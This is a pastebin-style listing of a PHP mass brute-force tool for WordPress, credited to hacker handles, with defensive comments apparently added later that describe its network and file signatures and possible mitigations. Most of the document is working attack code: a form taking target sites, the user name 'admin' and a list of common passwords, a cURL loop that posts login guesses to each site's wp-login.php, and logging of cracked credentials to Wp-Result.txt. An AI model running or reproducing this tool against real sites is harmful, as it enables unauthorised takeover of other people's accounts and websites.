KiLL3r-Dz

Wordpress Mass brute Force

Oct 22nd, 2012
  1.  
  2. <?
  3. # Wordpress Mass brute Force Priv8 ^_*
  4. # Coded by Lagrip-dz
  5. # Devloped by Th3 K!LL3r Dz
  6. # Style Leacked By Th3 K!LL3r Dz
  7. # copyright to sec4ever.com
  8. # special Greet'z to : n4ssim , Damane2011
  9. # Greet'z to : all sec4ver members
  // Emits the operator form as one literal string: a user-name field preset to 'admin',
  // a "sites" textarea (one target per line) and a "w0rds" textarea preloaded with eleven
  // common passwords. Any WordPress account still using one of those values is exposed to
  // this list exactly as shipped, so a password policy that rejects them removes the
  // default coverage of this tool.
  // Rendering the form makes the viewing browser request a favicon from dz48-coders.org
  // and background images from i43.tinypic.com / i41.tinypic.com; those hosts, the page
  // title and the meta author/description strings are usable as content signatures when
  // hunting for copies of this file in a web root.
  10. echo '<html>
  11. <head>
  12.     <link href="http://dz48-coders.org/indexi/pic/favicon.ico" type="image/x-icon" rel="shortcut icon" />
  13.     <meta name="author" content="Th3 K!LL3r Dz" />
  14.    <meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
  15.    <meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
  16. <title># Wordpress Mass brute Force #</title>
  17.  <style type=\'text/css\'>
  18. input[type=submit], input[type=button], input[type=reset]{
  19.     text-align:center;
  20.     background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  21.     border:1px solid #4D4D4D;
  22.     color:#FFFFFF;
  23.     border-top-color:#565656;
  24.     padding:4px 6px;
  25.     margin:4px 5px;
  26.     height:16px;
  27.     -moz-box-shadow:0 0 1px black;
  28.     -webkit-box-shadow:0 0 1px black;
  29.     box-shadow:0 0 1px black;
  30.     text-shadow:0 1px black;
  31.     -moz-border-radius:4px;
  32.     -webkit-border-radius:4px;
  33.     -khtml-border-radius:4px;
  34.     border-radius:4px;
  35.     height:23px;
  36. }
  37.  
  38.  
  39. input[type=text], input[type=password]{
  40.     background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  41.     border:1px solid #4D4D4D;
  42.     color:#CCCCCC;
  43.     border-top-color:#565656;
  44.     -moz-box-shadow:0 0 1px black;
  45.     -webkit-box-shadow:0 0 1px black;
  46.     box-shadow:0 0 1px black;
  47.     -moz-border-radius:4px;
  48.     -webkit-border-radius:4px;
  49.     -khtml-border-radius:4px;
  50.     border-radius:4px;
  51.     height:18px;
  52.     margin-left: 5px;
  53. }
  54. input , textarea , button , body , caption , table ,area , option {
  55.    outline:none;
  56.    transition: all 0.20s ease-in-out;
  57.    -webkit-transition: all 0.25s ease-in-out;
  58.    -moz-transition: all 0.25s ease-in-out;
  59.    border-radius:3px;
  60.    -webkit-border-radius:3px;
  61.    -moz-border-radius:3px;
  62.    //border:1px solid rgba(0,0,0, 0.2);
  63. /*   font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
  64. }
  65. input , textarea {
  66.    background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
  67. }
  68.  
  69. input , textarea {
  70.    outline:none;
  71.    transition: all 0.20s ease-in-out;
  72.    -webkit-transition: all 0.25s ease-in-out;
  73.    -moz-transition: all 0.25s ease-in-out;
  74.    border-radius:3px;
  75.    -webkit-border-radius:3px;
  76.    -moz-border-radius:3px;
  77.    border:1px solid rgba(0,0,0, 0.2);
  78. }
  79. input:focus, textarea:focus {
  80.  outline: 0;
  81.  border-color: rgba(82, 168, 236, 0.8);
  82.  -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  83.  -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  84.  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  85.  
  86.  
  87.    background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
  88.    overflow: auto;
  89.  
  90. }
  91. .x1 {}
  92. .x2 {font-size:13px;
  93. background-color:green;
  94. color:black;}
  95. hr {color:white;}
  96. a {color:black;}
  97. #x5 {
  98.     font-family:tahoma;}
  99. .d1 {color :#C17E0B;
  100. font-family:tahoma;
  101. font-size:13px;
  102. font-weight:bold;}
  103. #d4 {color:#C17E0B;
  104. font-family:tahoma;
  105. font-weight:bold;}
  106.  </style>
  107.  </head>
  108. </br></br>
  109. <center><b><font > Wordpress Mass brute Force </font></b><br /><br /><br />
  110. <form method="post" action="" enctype="multipart/form-data">
  111. <table width="50%" border="0">
  112. <tr><td><p ><font class="d1">User :</font>
  113. <input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
  114. </td></tr>
  115. <tr><td><font class="d1">Sites list :</font>
  116. </td><td><font class="d1" >Pass list :</font></td></tr>
  117. <tr><td>
  118. <textarea name="sites" cols="40" rows="13" ></textarea>
  119. </td><td>
  120. <textarea name="w0rds" cols="20" rows="13" >
  121. admin
  122. 123456
  123. password
  124. 102030
  125. 123123
  126. 12345
  127. 123456789
  128. pass
  129. test
  130. admin123
  131. demo
  132. </textarea>
  133. </td></tr><tr><td>
  134. <font >
  135. <input type="submit" name="x" value="start" id="d4">
  136. </font></td></tr></table>
  137. </form></center>';
  // Lifts PHP's execution time limit for this request (any error from the call is
  // suppressed by @), so the run is not ended by max_execution_time. On a shared host a
  // PHP worker that stays busy for an unusually long request is itself a hunting signal.
  138. @set_time_limit(0);
  139.  
  140.  
  // Driver: runs only when the form's submit field "x" is present in the POST body.
  // The "sites" and "w0rds" fields are split on "\n"; the single "usr" value is reused for
  // every attempt. The password loop is the OUTER loop and the site loop the inner one, so
  // a given site receives one attempt per pass over the whole site list rather than a
  // burst. Defensive consequence: short-window burst limits may not trigger on the target
  // side, whereas a cumulative failed-login lockout per account, MFA on wp-login.php, and
  // avoiding the default 'admin' user name still stop the guesses made here.
  141. if($_POST['x']){
  142.  
  143. echo "<hr>";
  144.  
  145. $sites = explode("\n",$_POST["sites"]); // Get Sites By Th3 K!LL3r Dz !
  146. $w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt By Th3 K!LL3r Dz !
  147.  
  148. $Attack = new Wordpress_brute_Force(); // Active Class
  149.  
  150.  
  151. foreach($w0rds as $pwd){
  152.  
  153. foreach($sites as $site){
  154.  
  155.  
  // One check_it() call per (password, site) pair; output is flushed after each call so
  // results reach the browser while the run is still in progress.
  156. $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
  157. flush();flush();
  158.  
  159. }
  160.  
  161. }
  162.  
  163. }
  164.  
  165.  
  166. # Class & Function'z
  167.  
  // Returns $value with every "\n" and "\r" character removed. It is applied to each
  // site and password line after the textarea input has been split on "\n"; no other
  // validation or normalisation of the value happens here.
  168. function txt_cln($value){  return str_replace(array("\n","\r"),"",$value); }
  169.  
  // Credential-guessing client for WordPress login pages. Indicators that can be read
  // directly from this class:
  //   * network: POSTs to <site>/wp-login.php carrying the fields log, pwd,
  //     rememberme=forever, wp-submit, redirect_to=<site>/wp-admin and testcookie=1;
  //   * network: a fixed User-Agent string ending in "Gecko/2008111317  Firefox/3.0.4"
  //     (note the double space), identical on every request;
  //   * network: the POST body is passed to cURL as a PHP array, which the cURL extension
  //     sends as multipart/form-data, whereas the standard WordPress login form posts
  //     application/x-www-form-urlencoded;
  //   * host: the files cookie.txt and Wp-Result.txt, both given as relative paths and so
  //     created relative to the script's working directory.
  170. class Wordpress_brute_Force{
  171.  
  // Reports one attempt. The attempt counts as a success when the body returned by post()
  // matches 'profile.php' case-insensitively. On success the user:password pair and the
  // site's /wp-admin/ URL are echoed and appended to Wp-Result.txt; otherwise a "Failed"
  // line is echoed. $site, $user and $pass are interpolated into the HTML output unescaped.
  172. public function check_it($site,$user,$pass){ // print result
  173.  
  174. if(eregi('profile.php',$this->post($site,$user,$pass))){
  175.  echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/wp-admin/'>$site/wp-admin/</a></b></span><BR>";
  176. $f = fopen("Wp-Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/\n"); fclose($f);
  177. flush();
  178. }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
  179.  
  180. }  
  181.  
  // Sends one login POST to $site.'/wp-login.php' and returns the response body (or
  // whatever curl_exec() returns on failure). Redirects are followed, cookies are read from
  // and written to a single cookie.txt for every target, and the request times out after
  // 20 seconds. The field set and User-Agent below are constant across attempts, which is
  // what makes them usable in WAF or log-based detection rules.
  182. public function post($site,$user,$pass){ // Post -> user & pass
  183. $login =$site.'/wp-login.php';
  184. $to = $site.'/wp-admin';
  185. $token = $this->extract_token($site);
  186. $log = array ('Log In','دخول');
  187. $data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);
  188.  
  189. $curl=curl_init();
  190.  
  191. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  192. curl_setopt($curl,CURLOPT_URL,$login);
  193. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
  194. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
  195. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
  196. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  197. curl_setopt($curl,CURLOPT_POST,1);
  198. curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
  199. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  200.  
  201. $exec=curl_exec($curl);
  202. curl_close($curl);
  203. return $exec;
  204.  
  205. }
  206.  
  // Searches the text returned by get_source() for a hidden input whose name is 32
  // hexadecimal characters and whose value is "1", and returns the first captured name.
  207. public function extract_token($site){ // get token from source for -> function post
  208.  
  209. $source = $this->get_source($site);
  210.  
  211. preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
  212.  
  213. return $token[1][0];
  214.  
  215. }
  216.  
  // Performs a cURL request without POST options and returns the result of curl_exec().
  // It uses the same cookie.txt jar, User-Agent string, redirect following and 20-second
  // timeout as post(), so it shares the same request fingerprint in server logs.
  217. public function get_source($site){ // get source for -> function extract_token
  218.  
  219. $curl=curl_init();
  220. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  221. curl_setopt($curl,CURLOPT_URL,$login);
  222. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
  223. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
  224. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
  225. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  226. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  227.  
  228. $exec=curl_exec($curl);
  229. curl_close($curl);
  230. return $exec;
  231.  
  232. }
  233.  
  234. }
  235. ?>